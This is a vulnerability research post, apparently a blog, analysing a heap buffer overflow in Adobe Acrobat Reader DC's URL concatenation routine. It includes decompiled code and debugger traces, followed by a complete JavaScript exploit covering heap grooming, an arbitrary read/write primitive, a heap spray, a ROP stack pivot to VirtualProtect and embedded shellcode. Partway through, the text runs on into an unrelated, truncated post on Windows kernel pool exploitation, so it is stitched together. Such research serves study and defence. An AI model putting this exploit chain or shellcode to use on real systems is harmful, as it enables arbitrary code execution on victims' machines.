Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.
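As a simplified, standalone model of that size mismatch (purely illustrative, not Reader’s code), the destination is sized for one byte per relative-URL character while the Unicode concatenation path emits two bytes per character:

#include <cstdio>
#include <cstring>

int main()
{
    const char *relativeUrl = "aaaaaaaaaaaaaaaa";          // ANSI-encoded relative URL
    const size_t baseUrlBytes = 42;                        // byte length of the Unicode base URL
    const size_t relBytes     = std::strlen(relativeUrl);  // ANSI length: one byte per character

    const size_t allocated = baseUrlBytes + relBytes + 1;      // how the destination buffer is sized
    const size_t written   = baseUrlBytes + 2 * relBytes + 2;  // what the Unicode copy path emits

    std::printf("allocated=%zu written=%zu overflow=%zu bytes\n",
                allocated, written, written - allocated);
    return 0;
}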

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the number of elements provided as the first parameter and the element size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed to by the first parameter. Its third parameter specifies the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks whether the length of the destination string plus the length of the source string is less than or equal to the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from the Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced).
  • Control Flow Guard (CFG): CFG must be disabled on the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and building an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the *Code Analysis* section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

The purpose of these allocations is to have a controllable memory region at the address where the stack is relocated after the execution of the stack pivot. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page where the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, in the hijackEIP function the getProperty function pointer of a DataView object under our control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed, which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and check out our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1

Introduction

I am writing this blog as I am finishing up an amazing training from HackSys Team. This training finally demystified the pool on Windows for me - something that I have always shied away from. During the training I picked up a lot of pointers (pun fully intended) on everything from an introduction to the kernel low fragmentation heap (kLFH) to pool grooming. As I use blogging as a mechanism not only to share what I know, but to reinforce concepts by writing about them, I wanted to leverage the HackSys Extreme Vulnerable Driver (HEVD), specifically the win10-klfh branch, to chain together two vulnerabilities in the driver from a low-integrity process - an out-of-bounds read and a pool overflow - to achieve an arbitrary read/write primitive. This blog, part 1 of the series, will outline the out-of-bounds read and kASLR bypass from low integrity.

Low-integrity processes and AppContainer-protected processes, such as a browser sandbox, restrict Windows API calls such as EnumDeviceDrivers and NtQuerySystemInformation, which are commonly leveraged to retrieve the base address of ntoskrnl.exe and/or other drivers for kernel exploitation. This stipulation requires either a generic kASLR bypass, as was common in the RS2 build of Windows via GDI objects, or some type of vulnerability. With generic kASLR bypasses now being very scarce and few and far between, information leaks, such as an out-of-bounds read, are the de facto standard for bypassing kASLR from something like a browser sandbox.

This blog will touch on the basic internals of the pool on Windows (which are already documented far better elsewhere than any attempt I could make), the implications of the kLFH from an exploit development perspective, and leveraging out-of-bounds read vulnerabilities.

Windows Pool Internals - tl;dr Version

This section will cover a bit about pre-segment-heap pool internals as well as how the segment heap works as of 19H1. First, Windows exposes the API ExAllocatePoolWithTag, the main API used for pool allocations, which kernel-mode drivers use to allocate dynamic memory, much like malloc in user mode. However, according to Microsoft, drivers targeting Windows 10 2004 or later must use ExAllocatePool2 instead of ExAllocatePoolWithTag, which has apparently been deprecated. For the purposes of this blog we will just refer to the “main allocation function” as ExAllocatePoolWithTag. One note about the “new” APIs is that they initialize allocated pool chunks to zero.

Continuing on, ExAllocatePoolWithTag’s prototype can be seen below.
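As documented in the WDK (wdm.h), it looks like this (reproduced here for reference):

PVOID ExAllocatePoolWithTag(
    POOL_TYPE PoolType,       // which pool to allocate from (see the POOL_TYPE values below)
    SIZE_T    NumberOfBytes,  // requested allocation size
    ULONG     Tag             // four-character pool tag, e.g. 'looP'
);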

The first parameter of this function is PoolType, an enumeration of type POOL_TYPE, which specifies the type of memory to allocate. These values can be seen below.
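An abridged version of the enumeration, per the public WDK headers (additional members are omitted here):

typedef enum _POOL_TYPE {
    NonPagedPool                  = 0,
    NonPagedPoolExecute           = 0,
    PagedPool                     = 1,
    NonPagedPoolMustSucceed       = 2,
    DontUseThisType               = 3,
    NonPagedPoolCacheAligned      = 4,
    PagedPoolCacheAligned         = 5,
    NonPagedPoolCacheAlignedMustS = 6,
    MaxPoolType                   = 7,
    NonPagedPoolNx                = 512,
    NonPagedPoolNxCacheAligned    = 516,
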